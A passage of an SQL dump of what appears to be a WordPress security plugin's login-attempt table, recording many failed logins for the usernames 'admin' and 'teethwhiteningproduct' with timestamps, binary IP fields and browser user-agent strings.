Chrome/36.0.1985.125 Safari/537.36'),(6249,8406,1629621799.606854,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��k�;�','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0'),(6250,8407,1629622292.758113,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��B��','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'),(6251,8408,1629623422.861775,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C�=�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(6252,8409,1629623771.098897,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6253,8409,1629623771.132028,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6254,8410,1629624556.175404,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��mW�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(6255,8410,1629624556.229487,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��mW�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(6256,8411,1629631281.374843,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���a�S','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6257,8412,1629631451.333040,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���옔','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),(6258,8413,1629632614.307469,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���#t;','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(6259,8414,1629633780.386038,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-�M^','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(6260,8415,1629633998.983048,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6261,8416,1629634955.999712,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����-%','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(6262,8417,1629634977.859371,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#ÇC','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6263,8418,1629635742.594009,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@t�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6264,8419,1629636130.104521,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QX4�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(6265,8420,1629636440.416946,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6266,8421,1629637134.662192,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6267,8422,1629637864.244309,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gV�]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6268,8423,1629638617.308899,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Oe,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6269,8424,1629639376.268149,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ՈLB','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6270,8425,1629640003.674464,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���_nq','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6271,8425,1629640003.741784,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���_nq','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6272,8426,1629640563.418698,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���a��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6273,8427,1629641141.263610,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���t�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6274,8428,1629641575.415156,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@�:�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6275,8429,1629642006.959155,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Bs�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6276,8430,1629642434.070222,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"Qq','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6277,8431,1629643138.211995,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���5T�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6278,8432,1629643202.919828,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���wң','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36'),(6279,8432,1629643203.312817,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���wң','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36'),(6280,8433,1629643798.866159,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��n-�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6281,8434,1629644131.036533,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����zX','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6282,8435,1629644463.842326,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6283,8436,1629644804.429823,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Vw�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6284,8437,1629645565.098814,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��tK�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(6285,8438,1629646746.284287,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��p','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36'),(6286,8439,1629647928.159372,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���n\\�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(6287,8440,1629649114.179314,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Z�&','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'),(6288,8440,1629649114.216396,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Z�&','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'),(6289,8441,1629650090.787295,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0�����\\','Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53'),(6290,8442,1629651335.314888,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(6291,8443,1629652176.667375,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���cr5','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'),(6292,8444,1629653997.072879,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���MW','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'),(6293,8445,1629654935.868960,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ܧe','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(6294,8446,1629655858.745520,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���1N','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(6295,8447,1629656777.712268,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����%+','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(6296,8448,1629657684.725777,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��vE��','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(6297,8449,1629658600.314575,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]qo6','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(6298,8450,1629659506.384504,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���aZ','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),(6299,8451,1629660419.332990,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��M��)','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36'),(6300,8452,1629661279.108347,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]��','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),(6301,8453,1629662103.258243,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/���','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'),(6302,8454,1629662929.776922,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����}','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),(6303,8455,1629663204.324536,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4'),(6304,8456,1629663380.899571,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��?���','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14'),(6305,8457,1629663760.973416,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���_S�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36'),(6306,8458,1629664602.460762,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����D�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'),(6307,8459,1629665430.713264,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��R@�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(6308,8460,1629666309.242693,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.�yo','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(6309,8460,1629666309.292972,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.�yo','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(6310,8461,1629668444.587191,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��r!Z','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'),(6311,8462,1629669311.190109,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����^�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(6312,8463,1629670148.192780,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gm','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(6313,8464,1629670985.228616,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���75�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0'),(6314,8465,1629671385.497488,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ð','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1500.55 Safari/537.36'),(6315,8466,1629671825.039350,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����-%','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(6316,8467,1629672672.527631,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_Q�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36'),(6317,8468,1629673518.063269,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'),(6318,8469,1629675154.151326,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��k�?�','Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0'),(6319,8470,1629675214.958287,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���E\"�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(6320,8471,1629676070.105874,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��B�S','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),(6321,8472,1629676922.604041,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g1?','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0'),(6322,8473,1629677782.550049,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��tK�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(6323,8473,1629677782.585380,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��tK�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(6324,8474,1629678638.597121,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(6325,8475,1629679206.294676,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��k�.�','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko'),(6326,8476,1629680367.205068,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'),(6327,8478,1629681243.160290,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���}7�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'),(6328,8479,1629682120.727353,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���)z�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(6329,8479,1629682120.781467,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���)z�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(6330,8480,1629682988.920891,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#��','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(6331,8481,1629683856.682690,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36'),(6332,8482,1629684727.194477,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���>}�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(6333,8483,1629685621.795158,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��t��','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'),(6334,8484,1629686445.780332,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���>|�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(6335,8485,1629687280.402399,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��(z��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'),(6336,8486,1629688968.503450,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���)z�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0'),(6337,8487,1629689788.041534,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���G','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'),(6338,8488,1629691421.408968,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"{��','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(6339,8489,1629692241.533296,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.�yo','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'),(6340,8490,1629693050.672351,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���A�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36'),(6341,8491,1629693860.898209,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(6342,8492,1629694675.529003,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����%+','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(6343,8493,1629696320.150614,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.��','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'),(6344,8494,1629696762.681469,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]�S','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6345,8495,1629697279.061514,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6346,8496,1629697888.478110,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���VK�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6347,8497,1629697966.830157,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���q�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),(6348,8498,1629698509.555685,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���5�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6349,8499,1629699224.438351,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\r�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6350,8500,1629699913.931972,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6351,8501,1629700442.385242,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�\Z','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(6352,8502,1629700645.487601,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����v�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6353,8503,1629701130.053984,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��k�4�','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0'),(6354,8504,1629701272.132473,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Z�w','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),(6355,8505,1629701374.195057,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���S��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6356,8506,1629702106.896958,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"F�A','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(6357,8507,1629702145.659621,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gzj�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6358,8508,1629702924.350422,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���VK�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6359,8509,1629703398.450369,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C�=�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(6360,8510,1629703728.244854,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ࣶ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6361,8511,1629704236.120862,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.��','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(6362,8512,1629704527.267270,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6363,8513,1629705075.721460,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�ڲ','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(6364,8514,1629705385.608840,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]qod','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6365,8514,1629705385.655850,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]qod','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6366,8515,1629706234.465281,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����9�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 